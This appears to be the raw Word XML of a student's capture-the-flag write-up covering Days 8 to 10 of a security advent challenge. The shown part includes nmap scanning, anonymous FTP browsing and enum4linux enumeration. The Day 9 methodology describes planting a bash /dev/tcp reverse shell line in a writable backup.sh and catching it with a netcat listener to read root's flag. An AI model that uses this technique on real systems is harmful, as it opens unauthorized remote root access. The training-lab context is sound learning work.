    <w:p w14:paraId="2A9CBBA9" w14:textId="4A0B792D" w:rsidR="0007236D" w:rsidRDefault="0007236D" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EDD040" w14:textId="3902AB83" w:rsidR="00ED4BF0" w:rsidRPr="00ED4BF0" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED4BF0">
        <w:t>he port numbers of the three services running</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are 80, 2222, 3389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F88A9" w14:textId="5BB346D5" w:rsidR="0007236D" w:rsidRDefault="00ED4BF0" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3A91EF2F" wp14:editId="46CF6292">
            <wp:extent cx="5632450" cy="30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2450" cy="3048000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B12D87" w14:textId="332C46D8" w:rsidR="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A6AC27" w14:textId="5E559921" w:rsidR="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E06686" w14:textId="60C6614B" w:rsidR="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:r>
        <w:t>The reported as the most likely distribution to be running Is Ubuntu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F6D90" w14:textId="546072F9" w:rsidR="008672AE" w:rsidRPr="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="132794F9" wp14:editId="648F268F">
            <wp:extent cx="560620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2602" cy="2821280"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDAB75F" w14:textId="62C71EA1" w:rsidR="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DC4A4A6" w14:textId="77777777" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AD00820" w14:textId="77777777" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B24B8F" w14:textId="77777777" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BEEE8CC" w14:textId="39D461A2" w:rsidR="008672AE" w:rsidRDefault="008672AE" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA42776" w14:textId="56F72C83" w:rsidR="008672AE" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:r>
        <w:t>The version of Apache is 2.4.29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63737E3F" w14:textId="0A098046" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40870333" wp14:editId="27D6636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8AB04F" w14:textId="489A86FD" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190"/>
    <w:p w14:paraId="6B396BE7" w14:textId="7705C69F" w:rsidR="0000222F" w:rsidRDefault="0000222F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1C556" w14:textId="0ACCDE70" w:rsidR="0000222F" w:rsidRDefault="00C775D1" w:rsidP="00103190">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C775D1">
        <w:t>running on port 2222</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E3112" w14:textId="445ED0F5" w:rsidR="00C775D1" w:rsidRDefault="00ED5324" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0483189B" w14:textId="4ACDA47B" w:rsidR="00ED5324" w:rsidRDefault="00ED5324" w:rsidP="00103190">
      <w:r>
        <w:t>The website might be used for blog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2BE032" w14:textId="6F7C8E61" w:rsidR="00ED5324" w:rsidRDefault="00ED5324" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D5E9427" wp14:editId="6396B7A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F01C6" w14:textId="75A3B702" w:rsidR="00ED5324" w:rsidRDefault="00ED5324" w:rsidP="00103190"/>
    <w:p w14:paraId="2B467A8E" w14:textId="77777777" w:rsidR="00ED5324" w:rsidRPr="002355FF" w:rsidRDefault="00ED5324" w:rsidP="00ED5324">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thought Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10FA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13359706" w14:textId="001D199A" w:rsidR="008672AE" w:rsidRDefault="00ED5324" w:rsidP="00103190">
      <w:r>
        <w:t>First, we type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP address” to find out t</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED5324">
        <w:t>he port numbers of the three services running</w:t>
      </w:r>
      <w:r>
        <w:t>. Next, we type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –script vuln IP address” to find the distribution to be running. We type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> IP address” to find out the version of Apache.</w:t>
      </w:r>
      <w:r w:rsidR="00FE72E5">
        <w:t xml:space="preserve"> We type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FE72E5">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE72E5">
        <w:t xml:space="preserve"> -A IP address” to find out the running port 2222 and the website might be used for.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776BE183" w14:textId="77777777" w:rsidR="00FE72E5" w:rsidRPr="00FE72E5" w:rsidRDefault="00FE72E5" w:rsidP="00103190"/>
    <w:p w14:paraId="17F11AE4" w14:textId="64B3ED67" w:rsidR="00103190" w:rsidRPr="0081607E" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Day 9</w:t>
      </w:r>
      <w:r w:rsidRPr="0081607E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking – </w:t>
      </w:r>
      <w:r w:rsidRPr="00103190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Anyone can be Santa!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A15EB1" w14:textId="7E25F60E" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Kali Linux, </w:t>
      </w:r>
      <w:r w:rsidR="00FE72E5">
        <w:t>Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA792E" w14:textId="77777777" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution/walkthrough</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A75E578" w14:textId="2B05E022" w:rsidR="00103190" w:rsidRDefault="00FE72E5" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B744767" w14:textId="780E4A0F" w:rsidR="00FE72E5" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:r>
        <w:t xml:space="preserve">There are four directions that can found on the FTP sites are backups, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elf_workshops</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>human_resources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C282B" w14:textId="1170003A" w:rsidR="0083492F" w:rsidRPr="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10C57149" wp14:editId="23B4B2B3">
            <wp:extent cx="5731510" cy="2400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07AC31CD" w14:textId="798B7098" w:rsidR="00FE72E5" w:rsidRDefault="00FE72E5" w:rsidP="00103190"/>
    <w:p w14:paraId="756B75C5" w14:textId="09CC6C5B" w:rsidR="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02659A69" w14:textId="56563A2A" w:rsidR="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidRPr="0083492F">
        <w:t>he directory on the FTP server that has data accessible by the "anonymous" user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45023D64" w14:textId="6F010351" w:rsidR="0083492F" w:rsidRPr="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14E92820" wp14:editId="363C61FC">
            <wp:extent cx="5731510" cy="241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0772FDE9" w14:textId="61837536" w:rsidR="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190"/>
    <w:p w14:paraId="0B3480D9" w14:textId="7E7F96CB" w:rsidR="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8E753" w14:textId="576CDB3E" w:rsidR="0083492F" w:rsidRDefault="0083492F" w:rsidP="00103190">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0083492F">
        <w:t>script gets executed within this directory</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is backup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623B132" w14:textId="210257DA" w:rsidR="0083492F" w:rsidRPr="0083492F" w:rsidRDefault="008B16C1" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F10043" wp14:editId="630FFC2D">
            <wp:extent cx="5746750" cy="2806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750" cy="2806700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A14CF5" w14:textId="5C120FEB" w:rsidR="00FE72E5" w:rsidRDefault="00FE72E5" w:rsidP="00103190"/>
    <w:p w14:paraId="3BF99E10" w14:textId="44E39583" w:rsidR="00FE72E5" w:rsidRDefault="008B16C1" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB9E86" w14:textId="4901DF37" w:rsidR="008B16C1" w:rsidRDefault="008B16C1" w:rsidP="00103190">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B16C1">
        <w:t>movie did Santa have on his Christmas shopping list</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is The Polar Express.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DD2CBA" w14:textId="7A68B96F" w:rsidR="008B16C1" w:rsidRDefault="00FC4E75" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E9ED488" wp14:editId="5F443E5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681A0" w14:textId="58190418" w:rsidR="008B16C1" w:rsidRDefault="008B16C1" w:rsidP="00103190"/>
    <w:p w14:paraId="77791B0A" w14:textId="77777777" w:rsidR="00FC4E75" w:rsidRDefault="00FC4E75" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A980FD" w14:textId="77777777" w:rsidR="00FC4E75" w:rsidRDefault="00FC4E75" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52BF0128" w14:textId="21786619" w:rsidR="00FC4E75" w:rsidRDefault="00FC4E75" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC4E75">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F195C4" w14:textId="1A1D44E7" w:rsidR="002D3A13" w:rsidRPr="002D3A13" w:rsidRDefault="002D3A13" w:rsidP="00103190">
      <w:r>
        <w:t>Type “cat /root/flag.txt” and get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050AC356" w14:textId="48F08390" w:rsidR="008B16C1" w:rsidRDefault="002D3A13" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5AB641" wp14:editId="2D5B4525">
            <wp:extent cx="4775200" cy="2590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5200" cy="2590800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C89E2AA" w14:textId="6FE92396" w:rsidR="00FC4E75" w:rsidRDefault="00FC4E75" w:rsidP="00103190"/>
    <w:p w14:paraId="7356CCBF" w14:textId="77777777" w:rsidR="002D3A13" w:rsidRPr="002355FF" w:rsidRDefault="002D3A13" w:rsidP="002D3A13">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thought Process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/Methodology</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10FA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26AF77A6" w14:textId="6180BC3E" w:rsidR="00A554D6" w:rsidRDefault="00C87DCE" w:rsidP="00103190">
      <w:r>
        <w:t>First, we type “ftp IP address” and type the name “anonymous” to log in. We type “ls” to view the directory. We type “cd public” to change the working directory and</w:t>
      </w:r>
      <w:r w:rsidR="00AA728B">
        <w:t xml:space="preserve"> type “ls” again to view those two working directory which named “backup.sh” and “shoppinglist.txt”. Next, we get “backup.sh” and “shoppinglist.txt”. We type exit and “ls” again to see what directory we have now. We type “nano backup.sh” and make all of them to command by adding hashtag in front of the text</w:t>
      </w:r>
      <w:r w:rsidR="00A96B85">
        <w:t>. We add a line “bash -I &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t>/IP address/4444 0&gt;&amp;1” at the last sentence and press “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>cntrl+X</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t>”, “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>cntrl+Y</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t>” and enter. Then, we open a new terminal and type “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>nc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>lvnp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t xml:space="preserve"> 4444”. We type “cat target.txt”  and do the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96B85">
        <w:t>previos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96B85">
        <w:t xml:space="preserve"> step to change the working directory “public</w:t>
      </w:r>
      <w:r w:rsidR="00D113E6">
        <w:t xml:space="preserve">. We put the “backup.sh” and back to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D113E6">
        <w:t>netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D113E6">
        <w:t xml:space="preserve"> listener. After the output appear, we type “cat /root/flag.txt” and get the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C29155" w14:textId="77777777" w:rsidR="00D113E6" w:rsidRPr="008B16C1" w:rsidRDefault="00D113E6" w:rsidP="00103190"/>
    <w:p w14:paraId="4BB7C739" w14:textId="2F0AB7B1" w:rsidR="00103190" w:rsidRPr="0081607E" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Day 10</w:t>
      </w:r>
      <w:r w:rsidRPr="0081607E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Networking – </w:t>
      </w:r>
      <w:r w:rsidRPr="00103190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Don't be </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00103190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>sElfish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00103190">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E6E60" w14:textId="28AD187E" w:rsidR="00944E25" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r w:rsidRPr="002355FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools used</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Kali Linux, </w:t>
      </w:r>
      <w:r w:rsidR="00944E25">
        <w:t>Terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE95D85" w14:textId="77777777" w:rsidR="00103190" w:rsidRDefault="00103190" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution/walkthrough</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2496E40F" w14:textId="654FE764" w:rsidR="00103190" w:rsidRDefault="00944E25" w:rsidP="00103190">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4BC8D7" w14:textId="5FA3D42F" w:rsidR="00944E25" w:rsidRDefault="00944E25" w:rsidP="00103190">
      <w:r>
        <w:t>Type “enum4linux -h” in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1003F7" w14:textId="3E288121" w:rsidR="00944E25" w:rsidRDefault="00944E25" w:rsidP="00103190">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32EEB15F" wp14:editId="5D275A88">
            <wp:extent cx="5731510" cy="3060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6E1A4502" w14:textId="49C8F88F" w:rsidR="00BE662B" w:rsidRDefault="00BE662B"/>
    <w:p w14:paraId="0C014D41" w14:textId="223D095E" w:rsidR="00944E25" w:rsidRDefault="00944E25">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D1B4A" w14:textId="75082A02" w:rsidR="00944E25" w:rsidRDefault="00042848">
      <w:r>
        <w:t>Type “enum4llinux -U IP address” in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55408A48" w14:textId="0C8B4ECC" w:rsidR="00042848" w:rsidRDefault="00042848">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080EF392" wp14:editId="52F7EEA7">
            <wp:extent cx="5238750" cy="29467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6467" cy="2951064"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="575A8F39" w14:textId="48355081" w:rsidR="00042848" w:rsidRDefault="00042848"/>
    <w:p w14:paraId="405E33B0" w14:textId="439CDE3B" w:rsidR="00042848" w:rsidRDefault="00042848">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE9AF65" w14:textId="608691CC" w:rsidR="00042848" w:rsidRDefault="00042848">
      <w:r>
        <w:t>Type “enum4linux -S IP address” in the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259420AB" w14:textId="7161FD5B" w:rsidR="00042848" w:rsidRDefault="00042848">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D8CD53C" wp14:editId="2A1B38E2">
            <wp:extent cx="5156200" cy="290029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9533" cy="2907791"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5741824B" w14:textId="0730695E" w:rsidR="00042848" w:rsidRDefault="00042848"/>
    <w:p w14:paraId="6746E0C3" w14:textId="50AC0CA7" w:rsidR="00042848" w:rsidRDefault="00042848">
      <w:pPr>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Question 4</w:t>
      </w:r>
    </w:p>
